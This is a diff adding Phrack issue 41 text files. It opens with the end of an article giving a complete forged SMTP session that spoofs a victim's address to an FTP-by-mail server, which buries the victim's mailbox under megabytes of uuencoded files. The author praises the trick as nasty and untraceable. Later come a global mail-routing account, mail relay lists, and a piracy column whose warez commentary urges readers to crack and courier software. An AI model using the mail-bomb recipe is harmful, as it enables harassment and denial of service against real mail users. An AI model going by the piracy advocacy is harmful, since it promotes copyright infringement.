+poor slob with an ungodly huge amount of mail, try doing a regular "fakemail"
+on the guy, with the enclosed message packet:
+
+> helo lycaeum.hfc.com
+> mail from: <dale@opus.tymnet.com>
+> rcpt to: <ftpmail@decwrl.dec.com>
+> data
+> Received: by lycaeum.hfc.com (5.12/3.7) id AA10992; Fri 9 Oct 92 12:00:00
+> Message-Id: <230.AA11891@lycaeum.hfc.com>
+> To: <listserv@brownvm.brown.edu>
+> Date: Fri, 09 Oct 92 12:00:00
+> Title:  Hey, I don't have THAT nifty program!
+>
+> reply dale@opus.tymnet.com
+> connect wuarchive.wustl.edu anonymous fistme@opus.tymnet.com
+> binary
+> get mirrors/gnu/gcc-2.3.2.tar.Z
+> quit
+> .
+
+        What is particularly nasty about this is that somewhere between 15 and
+20 megabytes of messages are going to be dumped into this poor guy's account.
+All of the files will be uuencoded and broken down into separate messages!
+Instead of deleting just one file, there will be literally hundreds of messages
+to delete!  Obnoxious!  Nearly impossible to trace, too!
+
+
+Part 2:  E-MAIL AROUND THE WORLD
+
+     Captain Crunch happened to make a telephone call around the world, which
+could have ushered in the age of phreak enlightenment -- after all, he proved
+that, through the telephone, you could "touch someone" anywhere you wanted
+around the world!  Billions of people could be contacted.
+
+     I undoubtedly pissed off a great number of people trying to do this e-mail
+trick -- having gotten automated complaints from many hosts.  Apparently, every
+country has some form of NSA.  This doesn't surprise me at all, I'm just
+somewhat amazed that entire HOSTS were disconnected during the times I used
+them for routers.  Fortunately, I was able to switch computers faster than they
+were able to disconnect them.
+
+     In order to send the e-mail, I couldn't send it through a direct path.
+What I had to do was execute UUCP style routing, meaning I told each host in
+the path to send the e-mail to the next host in the path, etc., until the last
+machine was done.  Unfortunately, the first machine I used for sending the
+e-mail had a remarkably efficient router and resolved the fact that the target
+was indeed the destination.  Therefore, I re-altered the path to a machine
+sitting about, oh, two feet away from it.  Those two feet are meaningless in
+this epic journey.
+
+      The originating host names have been altered as to conceal my identity.
+However, if we ever meet at a Con, I'll probably have the real print-out of the
+results somewhere and you can verify its authenticity.  Regardless, most of
+this same shit will work from just about any typical college campus Internet
+(and even Bitnet) connected machines.
+
+     In APPENDIX A, I've compiled a list of every foreign country that I could
+locate on the Internet.  I figured it was relatively important to keep with the
+global program and pick a series of hosts to route through that would
+presumably require relatively short hops.  I did this by using this list and
+trial and error (most of this information was procured from the Network
+Information Center, even though they deliberately went way the hell out of
+their way to make it difficult to get computers associated with foreign
+countries).
+
+     My ultimate choice of a path was:
+
+     lycaeum.hfc.com           -- Origin, "middle" America.
+     albert.gnu.ai.mit.edu     -- Massachusetts, USA.
+     isgate.is                 -- Iceland
+     chenas.inria.fr           -- France
+     icnucevx.cnuce.cn.it      -- Italy
+     sangram.ncst.ernet.in     -- India
+     waseda-mail.waseda.ac.jp  -- Japan
+     seattleu.edu              -- Seattle
+     inferno.hfc.com           -- Ultimate Destination
+
+     The e-mail address came out to be:
+
+isgate.is!chenas.inria.fr!icnucevx.cnuce.cn.it!sangram.ncst.ernet.in!
+waseda-mail.waseda.ac.jp!seattleu.edu!inferno.hfc.com!
+rack@albert.gnu.ai.mit.edu
+
+     ...meaning, first e-mail albert.gnu.ai.mit.edu, and let it parse the name
+down a line, going to Iceland, then to France, etc. until it finally reaches
+the last host on the list before the name, which is the Inferno, and deposits
+the e-mail at rack@inferno.hfc.com.
+
+     This takes a LONG time, folks.  Every failure toward the end took on
+average of 8-10 hours before the e-mail was returned to me with the failure
+message. In one case, in fact, the e-mail made it shore to shore and then came
+all the way back because it couldn't resolve the last hostname!  That one made
+it (distance-wise) all the way around the world and half again.
+
+     Here is the final e-mail that I received (with dates, times, and numbers
+     altered to squelch any attempt to track me):
+
+> Return-Path: <rack@lycaeum.hfc.com>
+> Received: from sumax.seattleu.edu [192.48.211.120] by Lyceaum.HFC.Com ; 19
+        Dec 92 16:23:21 MST
+> Received: from waseda-mail.waseda.ac.jp by sumax.seattleu.edu with SMTP id
+>         AA28431 (5.65a/IDA-1.4.2 for rack@inferno.hfc.com); Sat, 19 Dec 92
+>         14:26:01 -0800
+> Received: from relay2.UU.NET by waseda-mail.waseda.ac.jp (5.67+1.6W/2.8Wb)
+>         id AA28431; Sun, 20 Dec 92 07:24:04 JST
+> Return-Path: <rack@lycaeum.hfc.com>
+> Received: from uunet.uu.net (via LOCALHOST.UU.NET) by relay2.UU.NET with SMTP
+>         (5.61/UUNET-internet-primary) id AA28431; Sat, 19 Dec 92 17:24:08 -
+>         0500
+> Received: from sangam.UUCP by uunet.uu.net with UUCP/RMAIL
+>         (queueing-rmail) id 182330.3000; Sat, 19 Dec 1992 17:23:30 EST
+> Received: by sangam.ncst.ernet.in (4.1/SMI-4.1-MHS-7.0)
+>         id AA28431; Sun, 20 Dec 92 03:50:19 IST
+> From: rack@lycaeum.hfc.com
+> Received: from shakti.ncst.ernet.in by saathi.ncst.ernet.in
+>         (5.61/Ultrix3.0-C)
+>         id AA28431; Sun, 20 Dec 92 03:52:12 +0530
+> Received: from saathi.ncst.ernet.in by shakti.ncst.ernet.in with SMTP
+>         (16.6/16.2) id AA09700; Sun, 20 Dec 92 03:51:37 +0530
+> Received: by saathi.ncst.ernet.in (5.61/Ultrix3.0-C)
+>         id AA28431; Sun, 20 Dec 92 03:52:09 +0530
+> Received: by sangam.ncst.ernet.in (4.1/SMI-4.1-MHS-7.0)
+>         id AA28431; Sun, 20 Dec 92 03:48:24 IST
+> Received: from ICNUCEVX.CNUCE.CNR.IT by relay1.UU.NET with SMTP
+>         (5.61/UUNET-internet-primary) id AA28431; Sat, 19 Dec 92 17:20:23
+>         -0500
+> Received: from chenas.inria.fr by ICNUCEVX.CNUCE.CNR.IT (PMDF #2961 ) id
+>  <01GSIP122UOW000FBT@ICNUCEVX.CNUCE.CNR.IT>; Sun, 19 Dec 1992 23:14:29 MET
+> Received: from isgate.is by chenas.inria.fr (5.65c8d/92.02.29) via Fnet-EUnet
+>  id AA28431; Sun, 19 Dec 1992 23:19:58 +0100 (MET)
+> Received: from albert.gnu.ai.mit.edu by isgate.is (5.65c8/ISnet/14-10-91);
+> Sat, 19 Dec 1992 22:19:50 GMT
+> Received: from lycaeum.hfc.com by albert.gnu.ai.mit.edu (5.65/4.0) with
+>  SMTP id <AA28431@albert.gnu.ai.mit.edu>; Sat, 19 Dec 92 17:19:36 -0500
+> Received: by lycaeum.hfc.com (5.65/4.0) id <AA11368@lycaeum.hfc.com>;
+>  Sat, 19 Dec 92 17:19:51 -0501
+> Date: 19 Dec 1992 17:19:50 -0500 (EST)
+> Subject: Global E-Mail
+> To:   rack@inferno.hfc.com
+> Message-id: <9212192666.AA11368@lycaeum.hfc.com>
+> Mime-Version: 1.0
+> Content-Type: text/plain; charset=US-ASCII
+> Content-Transfer-Encoding: 7bit
+> X-Mailer: ELM [version 2.4 PL5]
+> Content-Length: 94
+> X-Charset: ASCII
+> X-Char-Esc: 29
+>
+> This Electronic Mail has been completely around the world!
+>
+> (and isn't even a chain letter.)
+
+===============================================================================
+
+APPENDIX A:
+
+List of Countries on the Internet by Root Domain
+
+(I tried to get a single mail router in each domain.  The domains that don't
+ have them are unavailable at my security clearance.  The computer is your
+ friend.)
+
+.AQ        New Zealand
+.AR        Argentina        atina.ar
+.AT        Austria          pythia.eduz.univie.ac.at
+.BB        Barbados
+.BE        Belgium          ub4b.buug.be
+.BG        Bulgaria
+.BO        Bolivia          unbol.bo
+.BR        Brazil           fpsp.fapesp.br
+.BS        Bahamas
+.BZ        Belize
+.CA        Canada           cs.ucb.ca
+.CH        Switzerland      switch.ch
+.CL        Chile            uchdcc.uchile.cl
+.CN        China            ica.beijing.canet.cn
+.CR        Costa Rica       huracan.cr
+.CU        Cuba
+.DE        Germany          deins.informatik.uni-dortmund.de
+.DK        Denmark          dkuug.dk
+.EC        Ecuador          ecuanex.ec
+.EE        Estonia          kbfi.ee
+.EG        Egypt
+.FI        Finland          funet.fi
+.FJ        Fiji
+.FR        France           inria.inria.fr
+.GB        England
+.GR        Greece           csi.forth.gr
+.HK        Hong Kong        hp9000.csc.cuhk.hk
+.HU        Hungary          sztaki.hu
+.IE        Ireland          nova.ucd.ie
+.IL        Israel           relay.huji.ac.il
+.IN        India            shakti.ernet.in
+.IS        Iceland          isgate.is
+.IT        Italy            deccnaf.infn.it
+.JM        Jamaica
+.JP        Japan            jp-gate.wide.ad.jp
+.KR        South Korea      kum.kaist.ac.kr
+.LK        Sri Lanka        cse.mrt.ac.lk
+.LT        Lithuania        ma-mii.lt.su
+.LV        Latvia
+.MX        Mexico           mtec1.mty.itesm.mx
+.MY        Malaysia         rangkom.my
+.NA        Namibia
+.NI        Nicaragua        uni.ni
+.NL        Netherlands      sering.cwi.nl
+.NO        Norway           ifi.uio.no
+.NZ        New Zealand      waikato.ac.nz
+.PE        Peru             desco.pe
+.PG        New Guinea       ee.unitech.ac.pg
+.PH        Philippines
+.PK        Pakistan
+.PL        Poland
+.PR        Puerto Rico      sun386-gauss.pr
+.PT        Portugal         ptifm2.ifm.rccn.pt
+.PY        Paraguay         ledip.py
+.SE        Sweden           sunic.sunet.se
+.SG        Singapore        nuscc.nus.sg
+.TH        Thailand
+.TN        Tunisia          spiky.rsinet.tn
+.TR        Turkey
+.TT        Trinidad & Tobago
+.TW        Taiwan           twnmoe10.edu.tw
+.UK        United Kingdom   ess.cs.ucl.ac.uk
+.US        United States    isi.edu
+.UY        Uruguay          seciu.uy
+.VE        Venezuela
+.ZA        South Africa     hippo.ru.ac.za
+.ZW        Zimbabwe         zimbix.uz.zw
+
+===============================================================================
+
+APPENDIX B:
+
+Basic SMTP Commands
+
+> HELO <hostname>           Tells mail daemon what machine is calling.  This
+                            will be determined anyway, so omission doesn't mean
+                            anonymity.
+
+> MAIL FROM: <path>         Tells where the mail came from.
+
+> RCPT TO: <path>           Tells where the mail is going.
+
+> DATA                      Command to start transmitting message.
+
+> QUIT                      Quit mail daemon, disconnects socket.
+
+> NOOP                      No Operation -- used for delays.
+
+> HELP                      Gives list of commands -- sometimes disabled.
+
+> VRFY                      Verifies if a path is valid on that machine.
+
+> TICK                      Number of "ticks" from connection to present
+                            ("0001" is a typical straight connection).
+
+===============================================================================
+
+APPENDIX C:
+
+BIT-FTP Help File
+
+   ftpmail@decwrl.dec.com (Digital FTP mail server)
+
+   Commands are:
+    reply <MAILADDR>              Set reply address since headers are usually
+                                  wrong.
+    connect [HOST [USER [PASS]]]  Defaults to gatekeeper.dec.com, anonymous.
+    ascii                         Files grabbed are printable ASCII.
+    binary                        Files grabbed are compressed or tar or both.
+    compress                      Compress binaries using Lempel-Ziv encoding.
+    compact                       Compress binaries using Huffman encoding.
+    uuencode                      Binary files will be mailed in uuencoded
+                                  format.
+    btoa                          Binary files will be mailed in btoa format.
+    ls (or dir) PLACE             Short (long) directory listing.
+    get FILE                      Get a file and have it mailed to you.
+    quit                          Terminate script, ignore rest of mail message
+                                  (use if you have a .signature or are a
+                                   VMSMAIL user).
+
+   Notes:
+   -> You must give a "connect" command (default host is gatekeeper.dec.com,
+      default user is anonymous, default password is your mail address).
+   -> Binary files will not be compressed unless "compress" or "compact"
+      command is given; use this if at all possible, it helps a lot.
+   -> Binary files will always be formatted into printable ASCII with "btoa" or
+      "uuencode" (default is "btoa").
+   -> All retrieved files will be split into 60KB chunks and mailed.
+   -> VMS/DOS/Mac versions of uudecode, atob, compress and compact are
+      available, ask your LOCAL wizard about them.
+   -> It will take ~1-1/2 day for a request to be processed.  Once the jobs has
+      been accepted by the FTP daemon, you'll get a mail stating the fact that
+      your job has been accepted and that the result will be mailed to you.
diff --git a/phrack41/5.txt b/phrack41/5.txt
new file mode 100644
index 0000000..7742c0f
--- /dev/null
+++ b/phrack41/5.txt
@@ -0,0 +1,541 @@
+                                ==Phrack Inc.==
+
+                   Volume Four, Issue Forty-One, File 5 of 13
+
+                                  Pirates Cove
+
+                                   By Rambone
+
+
+Welcome back to Pirates Cove.  News about software piracy, its effects, and the
+efforts of the software companies to put and end to it are now at an all time
+high.  Additionally, there is an added interest among the popular media towards
+the other goings-on in the piracy underworld.  Additionally over the past few
+months there have been several major crackdowns around the world.  Not all of
+the news is terribly recent, but a lot of people probably didn't hear about it
+at the time so read on and enjoy.
+
+If you appreciate this column in Phrack, then also be sure to send a letter to
+"phracksub@stormking.com" and let them know.  Thanks.
+_______________________________________________________________________________
+
+ More Than $100,000 In Illegal Software Seized
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+WASHINGTON -- (BUSINESS WIRE) -- Illegal software valued in excess of $100,000
+was seized from an electronic bulletin board computer system (BBS)
+headquartered in Baltimore, Maryland, marking the first U.S. case for the
+Business Software Alliance (BSA) against a BBS for pirating software.
+
+The BSA previously initiated an enforcement campaign against illegal bulletin
+boards in Europe and is investigating illegal boards in Asia.  As part of the
+U.S. seizure, more than $25,000 worth of hardware was confiscated in accordance
+with the court order, and the BBS, known as the APL, is no longer in operation.
+
+Investigations conducted over the past several months found that, through the
+APL BBS, thousands of illegal copies have been made of various software
+programs.  Plaintiffs in the case include six business software publishers:
+ALDUS, Autodesk, LOTUS Development, MICROSOFT, NOVELL, and WordPerfect.  The
+action against APL was for allegedly allowing BBS users to upload and download
+copyrighted programs.
+
+Nearly 500 software programs were available for copying through the APL BBS, an
+infringement of software publishers' copyright.  In addition, BSA seized APL's
+business records which detail members' time on the BBS and programs uploaded
+and/or copied.  BSA is currently reviewing these records for possible
+additional legal action against system users who may have illegally uploaded or
+downloaded copyrighted programs.
+
+"Electronic  bulletin boards create increasingly difficult problems in our
+efforts to combat piracy," according to Robert Holleyman, president of the BSA.
+"While bulletin boards are useful tools to enhance communication channels, they
+also provide easy access for users to illegally copy software," Holleyman
+explained.
+
+Strict federal regulations prohibit the reproduction of copyrighted software.
+Legislation passed this year by the U.S. Congress contains provisions to
+increase the penalties against copyright infringers to up to five years
+imprisonment and a $250,000 fine.
+
+The APL investigation, conducted by Software Security International on behalf
+of the BSA, concluded with a raid by Federal Marshals on October 1, 1992.  In
+addition to the six business software publishers, the BSA action was taken on
+behalf of Nintendo.
+
+Bulletin boards have grown in popularity over the past several years, totaling
+approximately 2000 in the United States alone.  Through a modem, bulletin board
+users can easily communicate with other members.  The BSA has recently stepped
+up its worldwide efforts to eradicate the illegal copying of software which
+occurs on some boards.
+
+The BSA is an organization devoted to combating software theft. Its worldwide
+campaign encompasses education, public policy, and enforcement programs in more
+than 30 countries.  The members of the BSA include:  ALDUS, APPLE COMPUTER,
+Autodesk, LOTUS Development, MICROSOFT, NOVELL, and WordPerfect.
+
+The BSA operates an Anti-piracy Hotline (800-688-2721) for callers seeking
+information about software piracy or to report suspected incidents of software
+theft.
+
+CONTACT:  Diane Smiroldo, Business Software Alliance, (202)727-7060
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Only The Beginning
+ ~~~~~~~~~~~~~~~~~~
+The bust of APL BBS had made unprecedented impacts in the pirate world because
+of the implications behind the actual arrest.  Business Software Alliance
+(BSA), representing many major business software companies along with Nintendo,
+joined forces to hit APL very hard.  They joined forces to permanently shut
+down APL and are, for the first time, trying to pursue the users that had an
+active role in the usage of the BBS.
+
+Trying to figure out who had uploaded and downloaded files through this BBS and
+taking legal recourse against them is a very strong action and has never been
+done before.  One of the major problem I see with this is how do they know if
+what the records show was the actual user or someone posing as another user?
+Also, how could they prove that an actual program was downloaded by an actual
+user and not by someone else using his account?  What if one user had logged on
+one time, never called back, and someone else had hacked their account?  I'm
+also sure a sysop has been known, on occasion, to "doctor" someone's account to
+not allow them to download when they have been leeching.
+
+The points I bring up are valid as far as I am concerned and unless the Secret
+Service had logs and phone numbers of people actually logged on at the time, I
+don't see how they have a case.  I'm sure they have a great case against the
+sysop and will pursue the case to the highest degree of the law, but if they
+attempt to arrest users, I foresee the taxpayers' money going straight down the
+drain.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ BSA Hits Europe
+ ~~~~~~~~~~~~~~~
+The Business Software Alliance reached their arms out across the Atlantic and
+landed in Germany.  Along with Interpol and the local police, they proceeded to
+take down 80% of the boards in Berlin.  One of the contributing factors in
+these busts was that the majority of the boards busted were also involved in
+toll fraud.  Until recently, blue boxing was the predominate means of
+communication with the United States and other countries in Europe. When most
+of these sysops were arrested, they had been actively blue boxing on a regular
+basis.  Unfortunately, many parts of Germany had already upgraded their phone
+system, and it became very risky to use a blue box.  It didn't stop most people
+and they soon became easy targets for Interpol.  The other means of LD usage
+for Germans was AT&T calling cards which now are very common. The local police
+along with the phone company gathered months of evidence before the city wide
+sweep of arrests.
+
+The busts made a bigger impact in Europe than anyone would have imagined.  Some
+of the bigger boards in Europe have been taken down by the sysops and many will
+never go back up.  Many sysops have been arrested and fined large amounts of
+money that they will be paying off for a long time.  BSA, along with local
+police and Interpol, has done enough damage in a few days that will change
+European Boards for a long time.
+_______________________________________________________________________________
+
+ IBM:  Free Disks For The Taking
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In a vain effort to increase sales, IBM decided to send out 21 high density
+diskettes to anyone who called.  On these diskettes was a new beta copy of OS/2
+Version 2.1.  They were hoping to take a cheap way out by sending a few out to
+people who would install it and send in beta reports.  What they got was
+thousands of people calling in when they heard the word who were promptly Fed
+Ex'ed the disks overnight.  The beta was not the concern of most, just the
+diskettes that were in the package.  The actual beta copy that was sent out was
+bug ridden anyway and was not of use on most systems.
+
+When IBM finally woke up and figured out what was going on, they had already
+sent out thousands of copies.  Some even requested multiple copies.  IBM then
+proceeded to charge for the shipment and disks, but it was way too late, and
+they had gone over budget.  Way to go IBM, no wonder your stock has plummeted
+to $55 a share.
+_______________________________________________________________________________
+
+ Users Strike Back At U.S. Robotics
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Since 1987, U.S. Robotics (USR) has been a standard among sysops and many end
+users.  With the loyal following also came terrible customer service and long
+delays in shipments.  Their modems, being in as much demand as they are, soon
+showed the results of shortcuts in the manufacture of certain parts in some of
+the more popular modems.  The most infamous instance of this happening was the
+Sportster model which was a V.32bis modem which could be bought at a much lower
+price than that of the Dual Standard.  The catch was that they cut some corners
+and used that same communication board for both the Sportster and the Dual
+Standard.  They assumed they could save money by using the same board on both
+modems.  Boy were they wrong.
+
+All that was done to the Sportster was to disable the HST protocol that would
+make it into a Dual.  With the proper init string, one could turn a Sportster,
+ROM version 4.1, into a full Dual in the matter of seconds and have spent 1/3
+of the price of a full Dual Standard.
+
+This outraged USR when they found out.  They first denied that it could be
+done.  When they found out that it had gotten too wide-spread and could not be
+stopped, they then proceeded to tell the public it was a copyright infringement
+to use the "bogus" init string and threatened to sue anyone who attempted to
+use it.  Most people laughed at that idea and continued to use it while giving
+"the bird" to USR.  Some vendors are now even trying to make a buck and sell
+Sportsters at a higher price, and some are even selling them as Duals.
+
+Obviously, they have now discontinued making the Sportsters the cheap way and
+are now making two separate boards for both modems.  The versions with the ROM
+4.1 are still floating around, can be found almost anywhere, and will always
+have the capabilities to be run as a full Dual.  Better watch out though.  The
+USR police might come knocking on your door <g>.
+_______________________________________________________________________________
+
+ Warez Da Scene?
+ ~~~~~~~~~~~~~~~
+Over the last 6 months there have been several changing of hands in the major
+pirate groups.  One person who supplies them has bounced to 3 groups in the
+last four months.  One group fell apart because of a lack of support from the
+major members, but is making a valiant comeback.  And yet another has almost
+split into two like AT&T stock.  We'll have to see what comes of that.
+
+While only about 15% or so actually doing anything for the scene, the other 85%
+seem to complain and bitch.  Either the crack doesn't work or someone forgot to
+put in the volume labels.  Jesus, how much effort does it take to say, "Hey,
+thanks for putting this out, but...".  The time and effort it takes to acquire
+the program, check to see if it needs to be cracked, package it, and have it
+sent out to the boards is time- and money-consuming and gets very little
+appreciation by the majority of the users around the world.
+
+Why not see some users send in donations to the group for the appreciation it
+takes to send the files out?  Why not see more users volunteer to help courier
+the programs around?  Help crack them?  Make some cheats, or type of some docs?
+Be a part of the solution instead of the problem.  It would create less
+headaches and gain more respect from the members who take the time and effort
+to make this all possible.
+_______________________________________________________________________________
+
+ Review Of The Month
+ ~~~~~~~~~~~~~~~~~~~
+I usually type up a review of the best program I have seen since the last
+issue, but since I was so disappointed with this game, I have to say something
+about it.
+
+
+  ___________________________________________________________________________
+ |                                                                           |
+ |   RELEASE INFORMATION                                                     |
+ |___________________________________________________________________________|
+ |                                                                           |
+ | Supplied by : ACTION MAN & MUNCHIE ...................................... |
+ | Cracked by  : HARD CORE ................................................. |
+ | Protection  : Easy Password ............................................. |
+ | Date        : 16th December 1992 (Still 14 days left!) .................. |
+ | Graphics    : ALL ....................................................... |
+ | Sound       : ALL ....................................................... |
+ | Game Size   : 5 1.44Mb disks , Installation from floppies ............... |
+ |___________________________________________________________________________|
+
+
+One of the most awaited games of the year showed up at my doorstep, just
+itching to be installed:  F15-]I[.  I couldn't wait to get this installed on
+the hard drive and didn't care how much space it took up.  I was informed
+during installation that the intro would take up over 2 megs of hard drive
+space, but I didn't care.  I wanted to see it all.  Once I booted it and saw
+the intro, I thought the game would be the best I had seen.  Too bad the other
+8 megs turned out to be a waste of hard drive space.
+
+I started out in fast mode, getting right up in the skies.  Too bad that's the
+only thing on the screen that I could recognize.  Zooming down towards the
+coast, I noticed that it looked damn close to the land and, in fact, it might
+as well have been.  The ocean consist of powder blue dots and had almost the
+same color consistency as the land.  Not finding anything in the air to shoot
+at, I proceeded to shoot a missile at anything that I thought would blow up.
+This turned out to be just about everything, including bridges.  Let a few
+gunshots loose on one and see a large fireworks display like you dropped a
+nuclear bomb on it.
+
+Close to 3 hours later, I finally found a jet, got it into my sights and shot 3
+missiles at it.   A large explosion, another one, and then he flew past me
+without even a dent showing.  I shot my last 2 at it, same result.  Thus my
+conclusion:  the Russians must have invincible planes.  Either that or F-15 ]I[
+has some major bugs.  I'll take a wild guess and say, hmm, bugs.
+
+This game is not worth the box it comes in and I would not suggest anyone,
+outside of a blind person, from purchasing this.  I hate ratings but I'll give
+it a 2/10.  The 2 is for modem play, which is not bad, but not good enough.
+_______________________________________________________________________________
+
+ Piracy's Illegal, But Not The Scourge It's Cracked Up To Be     August 9, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By T.R. Reid and Brit Hume (Chicago Tribune)(Page 7)
+
+The software industry has embarked on one of its periodic public relations
+campaigns to get people to believe it's being robbed blind by software pirates.
+Even The New York Times took the claims seriously and ran a front-page story
+illustrated by a picture of a cheerful computer hacker wearing a Hawaiian shirt
+sitting in his basement surrounded by PCs and awash in piles of disks, many of
+them containing bootleg programs.
+
+With a straight face, the Times reported the industry's claim that in 1990, the
+last year for which figures are available, programs worth $2.4 billion were
+pirated, an amount equal to nearly half the industry's total sales of $5.7
+billion.  In fact, the software industry has no way of knowing how much it lost
+to illegal copying, but the $2.4 billion figure is almost certainly rot.
+Here's why.
+
+It is true that it's a snap to make an "illegal" copy of a computer program and
+equally true that the practice is rampant.  You just put a disk in the drive,
+issue the copy command, and the computer does the rest.
+
+But there is simply no way the software industry can estimate accurately how
+many illegal copies there are, and even if it could, it couldn't possibly
+determine how many of them represent lost sales.  It does not follow that every
+time somebody makes a bootleg copy, the industry loses a sale.  That would be
+true only if the software pirate would have paid for the program had he or she
+not been able to get it for free.
+
+Indeed, some of those illegal copies undoubtedly lead to actual sales.  Once
+users try a program, particularly a full-scale application such as a word
+processor or database, and like it, they may decide they need the instruction
+book and want to be able to phone for help in using the program.
+
+The only way to get those things is to buy the software.  If that sounds
+pie-in-the-sky, consider that an entire branch of the industry has developed
+around just that process.  It's called shareware -- software that is offered
+free to try.  If you like it, you are asked to buy it.  In return, you get a
+bound manual and telephone support.
+
+The word processor with which this column was written, PC-Write, is such a
+program.  So is the telecommunications program by which it was filed, ProComm.
+These programs were both developed by talented independent software developers
+who took advantage of the unprecedented opportunity the personal computer
+provided them.  All they needed was a PC, a desk, a text editor and a special
+software tool called a "compiler."  A compiler translates computer code written
+in a language such as Basic, C or Pascal into the binary code that the computer
+can process.
+
+Once they had written their programs, they included a set of instructions in a
+text file and a message asking those who liked the software to pay a fee and
+get the benefits of being a "registered" user.  They then passed out copies to
+friends, uploaded them to computer bulletin boards and made them available to
+software libraries.  Everyone was encouraged to use the software -- and to pass
+it on.
+
+The ease with which the programs can be copied was, far from a problem for
+these developers, the very means of distribution.  It cost them nothing and
+they stood to gain if people thought their program good enough to use.  And
+gain they have.  Both PC-Write and ProComm have made a lot of money as
+shareware, and advanced versions have now been released through commercial
+channels.
+
+The point here is not that it's okay to pirate software.  It's not, and it's
+particularly dishonest to use a stolen program for commercial purposes.  The
+practice of buying one copy for an entire office and having everybody copy it
+and use the same manual is disgraceful.  Software may be expensive, but it's a
+deductible business expense and worth the price.
+
+At the same time, it's not such a bad thing to use an unauthorized copy as a
+way of trying out a program before you buy it.  The shareware industry's
+success has proved that can even help sales.
+_______________________________________________________________________________
+
+ No Hiding From The Software Police                            October 28, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Elizabeth Weise (The Seattle Times)(Page B9)(Associated Press)
+
+One call to the Piracy Hotline is all it takes for the Software Police to come
+knocking at your computers.  Parametrix Inc. of Seattle found that out last
+year when the Software Police, also known as the Software Publishers
+Association, showed up with a search warrant and a U.S marshal to audit their
+computers.  The search turned up dozens of copies of unauthorized software
+programs and meant a penalty of $350,000 for Parametrix.
+
+The SPA says too many companies "softlift" -- buying only one copy of a program
+they need and making copies for as many computers as they have.
+
+It seems so easy -- and it's just as easy to get caught.
+
+"It only takes one phone call to the 800 number to get the ball rolling.
+Anyone taking that chance is living on borrowed time," said Peter Beruk,
+litigation manager for the Washington D.C.-based SPA.  "You can run, but you
+can't hide."  And the stakes are getting higher.  A bill is before President
+Bush that would elevate commercial software piracy from a misdemeanor to a
+felony.  The law would impose prison terms of up to five years and fines of up
+to $250,000 for anyone convicted for stealing at least 10 copies of a program,
+or more than $2,500 worth of software.
+
+Those in the computer industry say softlifting will be hard to prevent unless
+programmers are better policed.  AutoDesk Retail Products in Kirkland has met
+obstacles in educating its staff on the law.  AutoDesk makes computer-assisted
+drawing programs.  "The problem is that you end up employing people who don't
+want to follow convention," AutoDesk manager John Davison said.  "We hire
+hackers.  To them it's not stealing, they just want to play with the programs.
+"You got a computer, you got a hacker, you got a problem."  Bootlegging results
+in an estimated loss of $2.4 million to U.S. software publishers each year,
+Beruk said.  That's out of annual sales of between $6 billion and $7 billion.
+"For every legal copy of a program sold, there's an unauthorized copy of it in
+use on an everyday basis," Beruk said.  As SPA and its member companies see it,
+that's theft, plain and simple.
+
+SPA was founded in 1984.  One of its purposes: to enforce copyright
+infringement law for software manufacturers.  Since then it has conducted 75
+raids and filed about 300 lawsuits, Beruk said.  Several of the larger raids
+have been in the Northwest.  The SPA settled a copyright lawsuit against
+Olympia-based U.S. Intelco for $50,000 in May.  Last year, the University of
+Oregon Continuation Center in Eugene, Oregon, agreed to pay $130,000 and host a
+national conference on copyright law and software use as part of a negotiated
+settlement with SPA.  The tip-off call often comes to SPA's toll-free Piracy
+Hotline.  It's often disgruntled employees, or ex-employees, reporting that the
+company is running illegal copies of software programs, Beruk said.
+
+At Parametrix, an investigation backed up the initial report and SPA got a
+search warrant, Beruk said.  President Wait Dalrymple said the company now does
+a quarterly inventory of each computer.  The company brings in an independent
+company once a year to check for unauthorized programs.
+
+Softlifting, Dalrymple said, can be an easy tangle to get into.  "Our company
+had had extremely rapid growth coupled with similar growth in the number of
+computers we use," he said.  "We had no policy regarding the use of our
+software and simply didn't control what was happening."
+
+Making bootleg copies of software is copyright infringement, and it's as
+illegal -- and as easy -- as copying a cassette tape or a video tape.  The
+difference is in magnitude.  A cassette costs $8, a video maybe $25, while
+computer programs can cost hundreds and even thousands of dollars.  Audio and
+video tapes come with FBI warnings of arrest for illegal copying.  Software
+comes with a notice of copyright penalties right on the box.  But despite such
+threats, softlifting isn't taken seriously, said Julie Schaeffer, director of
+the Washington Software Association.  "It's really in the same arena of
+intellectual property," Schaeffer said.  "But people don't think about the
+hours and hours of work that goes into writing a program."
+
+The Boeing Co. in Seattle is one company that tries hard not to break the law.
+It has a department of Software Accountability, which monitors compliance with
+software licensing.
+
+AutoDesk resorts to a physical inventory of the software manuals that go with a
+given program.  If programmers don't have the manuals in their work cubicles,
+they can be fined $50.
+
+The SPA itself said the problem is more one of education than enforcement.
+"Because copying software is so easy and because license agreements can be
+confusing, many people don't realize they're breaking the law," the SPA said.
+
+Feigning ignorance of the law doesn't help.  With Microsoft products, a user is
+liable as soon as the seal on a package of software is broken.  "At that point
+you've agreed to Microsoft's licensing agreement under copyright law,"
+Microsoft spokeswoman Katy Erlich said.  "It says so right on the package."
+_______________________________________________________________________________
+
+ Teenage Pirates and the Junior Underworld                    December 11, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ by Justin Keery (The Independent)(Page 31)
+
+                  "By the end of the year, any schoolboy with
+                    a computer who wants Sex will get it."
+
+The first print-run of 100,000 copies of Madonna's Sex has sold out.  A further
+120,000 will be printed before Christmas, and bookshops have ordered every last
+one.  But parents beware... around 5,000 school children have their own copy,
+and the number is growing rapidly as floppy disks are circulated in
+playgrounds.
+
+Viewing the disk edition on a computer reveals television-quality images from
+the book -- the text, it seems, is deemed superfluous.  In disk form the
+pictures can be copied and traded for video games, credibility or hard cash in
+a thriving underground marketplace.  By the end of the year, any schoolboy with
+a computer who wants Sex will get it.  The unlucky will catch a sexually
+transmitted disease in the process -- the Disaster Master virus, found on the
+Independent's copy.
+
+Sex is a special-interest area in the thriving junior underworld of software
+trading.  Circulation of Madonna's pictures among minors with neither the
